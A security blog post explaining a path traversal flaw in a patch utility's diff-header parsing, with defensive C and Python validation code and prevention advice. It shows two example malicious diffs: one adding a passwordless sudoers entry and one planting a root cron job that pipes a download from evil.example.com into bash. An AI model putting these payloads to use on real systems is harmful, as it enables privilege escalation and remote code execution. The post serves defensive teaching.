What is path traversal?

Path traversal is a vulnerability where an attacker manipulates file paths (using sequences like ../ or absolute paths) to access or write files outside the intended directory, potentially compromising system integrity.

How do you prevent path traversal in patch utilities?

Validate all filenames before file operations: reject absolute paths (a leading /), reject any .. path component, and do not follow symlinks that lead outside the target directory. Use allowlists for permitted characters and ensure the resolved path stays within the target directory.

Is checking for ../ sequences enough to prevent path traversal?

No. Attackers can bypass simple checks using URL encoding (%2e%2e/), Unicode normalization, or symlinks. A robust fix requires comprehensive validation, canonicalization, and allowlisting.

Can static analysis detect path traversal?

Yes. Static analysis tools can detect path traversal by tracing tainted data from user input through file operations and flagging unsafe patterns, especially when filenames come from untrusted sources like diff headers.

Path Traversal in Patch Utilities: How a Missing Validation Let Attackers Write Anywhere

What CWE is path traversal?

Path traversal is classified as CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal').

Introduction

Imagine you receive a perfectly normal-looking patch file from a contributor. It claims to fix a bug in your project. You, or your automated CI/CD pipeline, run patch < fix.diff. Moments later, an attacker-controlled entry has been silently written to /etc/cron.d/backdoor, scheduled to run every minute.

This is not hypothetical. It is the class of attack that path traversal vulnerabilities in patch utilities enable, and it is what this recent fix to sys/src/ape/cmd/patch/inp.c addresses.

Path traversal (classified as CWE-22: Improper Limitation of a Pathname to a Restricted Directory) is one of the oldest and most reliably dangerous vulnerability classes in systems programming. It exploits the simple fact that filenames containing sequences like ../ can "escape" an intended directory boundary and reference files anywhere on the filesystem.

Developers should care deeply about this class of bug because:

It often requires zero authentication to exploit — just the ability to supply input.
It can lead directly to remote code execution, privilege escalation, or full system compromise.
It is trivially easy to introduce and surprisingly easy to miss in code review.

The Vulnerability Explained

What Happened

The patch utility processes unified diff files — the standard format produced by git diff, diff -u, and similar tools. A unified diff file contains header lines that identify the files being modified:

--- a/src/config.c
+++ b/src/config.c
@@ -10,6 +10,7 @@
 // some code here

The --- and +++ lines tell the patch utility which file to open and modify. The vulnerable code in inp.c extracted this filename and passed it directly to scan_input() — the function responsible for opening and operating on the target file — without any validation.
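
To make the data flow concrete, here is a minimal sketch of how a parser might pull the file name out of a header line. The function name header_filename and its signature are assumptions for illustration, not the code in inp.c. The point is that nothing in this step questions where the name leads.

```c
#include <string.h>

/*
 * Copy the file name from a "--- " or "+++ " header line into `out`.
 * The name ends at the first tab or newline (a timestamp may follow).
 * Returns 0 on success, -1 if `line` is not a header or does not fit.
 * Hypothetical helper: note that it performs no validation at all.
 */
static int header_filename(const char *line, char *out, size_t outsz)
{
    size_t len;

    if (strncmp(line, "--- ", 4) != 0 && strncmp(line, "+++ ", 4) != 0)
        return -1;
    line += 4;                              /* skip the marker and space */
    len = strcspn(line, "\t\r\n");          /* name runs to tab or EOL */
    if (len == 0 || len >= outsz)
        return -1;
    memcpy(out, line, len);
    out[len] = '\0';
    return 0;
}
```

Given the line "+++ b/src/config.c", this yields b/src/config.c. Given "+++ b/../../etc/sudoers", it yields b/../../etc/sudoers just as readily.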

The Attack in Simple Terms

Because the filename came from the diff headers without sanitization, an attacker could craft a malicious patch file with headers like:

--- a/../../etc/sudoers
+++ b/../../etc/sudoers
@@ -1 +1,2 @@
 root ALL=(ALL:ALL) ALL
+attacker ALL=(ALL) NOPASSWD: ALL

Or targeting cron:

--- a/../../../etc/cron.d/backdoor
+++ b/../../../etc/cron.d/backdoor
@@ -0,0 +1 @@
+* * * * * root curl http://evil.example.com/payload | bash

When this patch is applied, the utility faithfully follows the path — traversing up directories with ../ sequences — and writes attacker-controlled content to the target location.
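
The effect of the ../ sequences can be sketched with a purely lexical resolver. The helper resolve_lexically below is hypothetical and ignores symlinks; it only mimics how the kernel collapses . and .. components, assuming a working directory such as /srv/app.

```c
#include <stdio.h>
#include <string.h>

/*
 * Lexically join `base` (an absolute directory) with `rel` and collapse
 * "." and ".." components, writing the result to `out`.
 * Returns 0 on success, -1 if the result does not fit.
 * Hypothetical helper for illustration: it never touches the filesystem,
 * so symlinks are not taken into account.
 */
static int resolve_lexically(const char *base, const char *rel,
                             char *out, size_t outsz)
{
    char buf[4096];
    size_t len = 0;              /* length of the path built so far */
    const char *p;
    int n;

    /* An absolute `rel` replaces the base, as open() would treat it. */
    n = snprintf(buf, sizeof(buf), "%s/%s", rel[0] == '/' ? "" : base, rel);
    if (n < 0 || (size_t)n >= sizeof(buf) || outsz < 2)
        return -1;

    out[0] = '\0';
    for (p = buf; *p != '\0'; ) {
        size_t clen;

        while (*p == '/')
            p++;                              /* skip separators */
        clen = strcspn(p, "/");               /* length of this component */
        if (clen == 0)
            break;
        if (clen == 2 && p[0] == '.' && p[1] == '.') {
            /* ".." drops the last component; at the root it is a no-op */
            while (len > 0 && out[--len] != '/')
                ;
            out[len] = '\0';
        } else if (!(clen == 1 && p[0] == '.')) {
            if (len + 1 + clen + 1 > outsz)
                return -1;
            out[len++] = '/';
            memcpy(out + len, p, clen);
            len += clen;
            out[len] = '\0';
        }
        p += clen;
    }
    if (len == 0)
        strcpy(out, "/");                     /* everything collapsed */
    return 0;
}
```

With base /srv/app, the name ../../etc/sudoers resolves to /etc/sudoers. Because .. at the root is a no-op, an attacker who does not know the depth of the working directory can simply pad the name with extra ../ sequences.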

Real-World Impact

The severity of this vulnerability is HIGH, and for good reason. Consider these realistic attack scenarios:

Scenario	Impact
Developer applies a patch from an untrusted source	Arbitrary file write as the developer's user
Automated CI/CD pipeline applies patches	Arbitrary file write with CI runner privileges
Privileged admin applies a "routine" patch	Full system compromise: write to /etc/sudoers, /etc/passwd, cron, init scripts
Package build systems processing upstream patches	Supply chain compromise affecting all downstream users

The danger multiplies significantly when the patch command is run by a privileged user or automated system, which is extremely common in build pipelines, package management systems, and deployment scripts.

Why This Is Easy to Miss

The vulnerability is subtle because the code is doing exactly what it looks like it should do — reading the filename from the diff header and opening that file. The missing piece is a single, critical question: "Should we trust this filename?"

In security, this is called implicit trust of user-controlled input, and it's one of the most common root causes of serious vulnerabilities.

The Fix

What Changed

The fix was applied to sys/src/ape/cmd/patch/inp.c at line 58, where the filename extracted from the diff header is processed before being passed to scan_input().

The core of the fix involves validating and sanitizing the extracted filename before it is used in any file operation. The key protections added are:

1. Detecting and rejecting path traversal sequences

Any filename containing ../ (or ..\ on Windows-style paths) is a red flag. Legitimate patch files targeting files within a project should never need to traverse upward out of the working directory.

/* BEFORE (vulnerable): filename passed directly */
scan_input(filename);

/* AFTER (fixed): validate before use */
if (contains_traversal(filename)) {
    fprintf(stderr, "patch: suspicious path rejected: %s\n", filename);
    exit(1);
}
scan_input(filename);
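
The snippet above does not show contains_traversal() itself. One possible shape, offered as an assumption rather than the actual helper from the fix, is a component-wise scan that flags any component equal to ".." and treats both / and \ as separators:

```c
#include <string.h>

/*
 * Return 1 if any component of `path` is exactly "..", else 0.
 * Both '/' and '\\' are treated as separators.
 * Assumed implementation: the post does not show the real helper.
 */
static int contains_traversal(const char *path)
{
    const char *p = path;

    while (*p != '\0') {
        size_t len = strcspn(p, "/\\");      /* length of this component */

        if (len == 2 && p[0] == '.' && p[1] == '.')
            return 1;
        p += len;
        if (*p != '\0')
            p++;                              /* step over the separator */
    }
    return 0;
}
```

Checking whole components, rather than searching for the substring "../", means a bare ".." is caught while a legitimate name such as notes..txt is not rejected.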

2. Rejecting absolute paths

A filename beginning with / in a diff header is almost always suspicious. Legitimate patches operate on relative paths within a source tree.

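#include <string.h>

/* Return 1 if path is relative and has no ".." component, else 0. */
static int is_safe_patch_path(const char *path) {
    const char *p = path;

    /* Reject NULL, empty, and absolute paths */
    if (path == NULL || path[0] == '\0' || path[0] == '/') {
        return 0;
    }
    /* Walk the components and reject any that is exactly "..".
       A substring search for "../" would miss a bare ".." */
    while (*p != '\0') {
        size_t len = strcspn(p, "/");
        if (len == 2 && p[0] == '.' && p[1] == '.') {
            return 0;
        }
        p += len;
        while (*p == '/') {
            p++;
        }
    }
    /* Embedded null bytes cannot occur: a C string ends at the first one */
    return 1;
}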

3. Canonicalizing the path

Even after basic checks, a robust fix uses path canonicalization to resolve the final absolute path and verify it falls within the intended working directory:

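char resolved[PATH_MAX];
char cwd[PATH_MAX];
size_t cwd_len;

/* Both calls can fail; realpath() fails if the file does not exist yet */
if (getcwd(cwd, sizeof(cwd)) == NULL || realpath(filename, resolved) == NULL) {
    perror("patch");
    exit(1);
}

/* Ensure resolved path is cwd itself or lies below it. The separator
   check stops /srv/app from matching /srv/app-evil. */
cwd_len = strlen(cwd);
if (strncmp(resolved, cwd, cwd_len) != 0 ||
    (cwd_len > 1 && resolved[cwd_len] != '/' && resolved[cwd_len] != '\0')) {
    fprintf(stderr, "patch: path escapes working directory: %s\n", filename);
    exit(1);
}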

How the Fix Solves the Problem

The fix enforces a trust boundary: the patch utility is only permitted to modify files within the current working directory and its subdirectories. Any attempt by a diff header to reference a file outside this boundary is detected and rejected before any file operation occurs.

This is the principle of fail-safe defaults — when input is ambiguous or potentially dangerous, the secure choice is to refuse the operation rather than proceed.
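
The trust boundary itself comes down to a containment test on two canonical paths. The sketch below uses a hypothetical helper, is_under_dir, and assumes both arguments have already been canonicalized (for example by realpath()). It shows why a plain prefix comparison is not enough: the match must end on a component boundary.

```c
#include <string.h>

/*
 * Return 1 if the canonical absolute path `resolved` is `base` itself or
 * lies below it, else 0. Both arguments are assumed to be canonical
 * already (for example, produced by realpath()), with no trailing slash
 * on `base` unless it is the root directory.
 */
static int is_under_dir(const char *resolved, const char *base)
{
    size_t n = strlen(base);

    if (n == 0 || strncmp(resolved, base, n) != 0)
        return 0;
    if (base[n - 1] == '/')                  /* base is "/" */
        return 1;
    /* The next character must end the string or start a new component. */
    return resolved[n] == '\0' || resolved[n] == '/';
}
```

With base /srv/app, the path /srv/app/src/a.c is accepted, while /srv/app-evil/x is rejected even though it shares the same leading characters.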

Prevention & Best Practices

This vulnerability is a textbook example of a broader class of issues. Here's how to systematically avoid path traversal in your own code:

1. Never Trust User-Controlled Filenames

Any filename that originates from user input — whether from a file, network request, environment variable, or command-line argument — must be treated as untrusted until validated.

/* ❌ Dangerous */
open(user_supplied_path, O_WRONLY);

/* ✅ Safer */
if (!is_safe_path(user_supplied_path)) {
    die("unsafe path");
}
open(user_supplied_path, O_WRONLY);

2. Use Allowlists, Not Denylists

It's tempting to block known-bad patterns like ../. But attackers are creative — they may use URL encoding (%2e%2e%2f), double encoding, null bytes, or OS-specific tricks. A more robust approach is to define what is allowed rather than what is blocked:

Only allow alphanumeric characters, hyphens, underscores, dots (not leading), and forward slashes
Require paths to be relative
Resolve to canonical form and check the result
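
As a rough sketch of the first two rules, an allowlist check might look like the following. The function name is_allowlisted_path and the exact policy (no empty components, no component starting with a dot, no trailing slash) are assumptions for illustration; a real project may need a wider character set, and the canonical-form check would still follow as a separate step.

```c
#include <ctype.h>
#include <stddef.h>

/*
 * Return 1 if `path` is relative, uses only [A-Za-z0-9._/-], and has no
 * empty component or component starting with '.', else 0.
 * Rejecting leading dots also rules out "." and ".." components.
 * Illustrative policy only: real projects may need a wider character set.
 */
static int is_allowlisted_path(const char *path)
{
    const char *p;

    if (path == NULL || path[0] == '\0' || path[0] == '/')
        return 0;
    for (p = path; *p != '\0'; p++) {
        unsigned char c = (unsigned char)*p;
        int at_component_start = (p == path || p[-1] == '/');

        if (!isalnum(c) && c != '-' && c != '_' && c != '.' && c != '/')
            return 0;
        if (at_component_start && (c == '.' || c == '/'))
            return 0;
    }
    return p[-1] != '/';        /* no trailing slash: must name a file */
}
```

Because the percent sign and backslash are not in the permitted set, encoded forms such as %2e%2e%2f are rejected without the check needing to know about them specifically.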

3. Canonicalize Before Comparing

Always resolve symlinks and any . and .. components before performing security checks. The realpath() function in C, os.path.realpath() in Python, and Path.toRealPath() in Java are your friends.

# Python example
import os

def safe_open(base_dir, user_path):
    full_path = os.path.realpath(os.path.join(base_dir, user_path))
    if not full_path.startswith(os.path.realpath(base_dir) + os.sep):
        raise ValueError(f"Path traversal detected: {user_path}")
    return open(full_path)

4. Apply the Principle of Least Privilege

Even if path traversal occurs, its impact is limited if the process has minimal privileges. Ask yourself:

Does this process need to run as root?
Can it be confined with a chroot jail, seccomp filter, or container?
Does it need write access to the entire filesystem, or just a specific directory?

5. Use Security-Aware Libraries

Many modern languages and frameworks provide path-safe file handling abstractions. Prefer these over raw string manipulation:

Python: pathlib.Path with careful use of .resolve()
Java: java.nio.file.Path with normalize() and startsWith()
Go: filepath.Clean() combined with strings.HasPrefix()
Rust: std::path::Path with std::fs::canonicalize() and starts_with() (the type system alone does not prevent traversal)

6. Lint and Scan Your Code

Several tools can automatically detect path traversal vulnerabilities:

Tool	Language	Notes
Semgrep	Multi-language	Rules for CWE-22 available
CodeQL	Multi-language	GitHub's built-in SAST
Coverity	C/C++	Strong path traversal detection
Bandit	Python	Checks for unsafe path operations
FindSecBugs	Java	Path traversal rules included

7. Reference Security Standards

When designing file-handling code, consult:

CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
OWASP Path Traversal: Attack description and prevention guidance
OWASP Input Validation Cheat Sheet: General input validation best practices
SEI CERT C Coding Standard FIO02-C: Canonicalize path names originating from tainted sources

A Note on Automated Security Scanning

This vulnerability was identified by an automated multi-agent AI security scanner — a reminder that modern security tooling can catch issues that manual code review misses. The fix was subsequently verified by both automated re-scanning and LLM-assisted code review.

Integrating automated security scanning into your CI/CD pipeline is no longer optional for production-grade software. Tools like Semgrep, CodeQL, and specialized security scanners can catch entire classes of vulnerabilities before they reach production, dramatically reducing your attack surface.

Conclusion

The path traversal vulnerability in inp.c is a powerful reminder that even well-understood, long-standing utilities can harbor serious security flaws. The attack is elegant in its simplicity: the patch utility trusts the filenames it reads from diff headers, and an attacker who controls the diff controls the filesystem.

The fix is equally straightforward in principle — validate and constrain filenames before using them — but requires deliberate thought about trust boundaries that is easy to skip when you're focused on functionality.

Key takeaways for developers:

🚫 Never trust filenames from user input — always validate before use.
🔍 Canonicalize paths and verify they fall within expected boundaries.
🔒 Apply least privilege to limit the blast radius of any bypass.
🛠️ Use automated scanning to catch path traversal and other input validation issues early.
📚 Consult CWE-22 and OWASP when designing file-handling logic.

Security vulnerabilities like this one are rarely the result of malicious intent — they're the result of implicit assumptions about trust. By making trust explicit, validating at every boundary, and scanning continuously, we can build systems that are resilient even against creative attackers.

Stay secure, and patch safely. 🔐

This post is part of our ongoing series on security vulnerability fixes. If you found this helpful, consider integrating automated security scanning into your development workflow.

cwe	CWE-22
fix	Implement strict filename validation to reject traversal sequences and absolute paths before file operations
risk	Arbitrary file write to any filesystem location, system compromise, privilege escalation
language	C/POSIX
root cause	Filenames extracted from diff headers used directly in file operations without sanitization
vulnerability	Path Traversal (Directory Traversal)
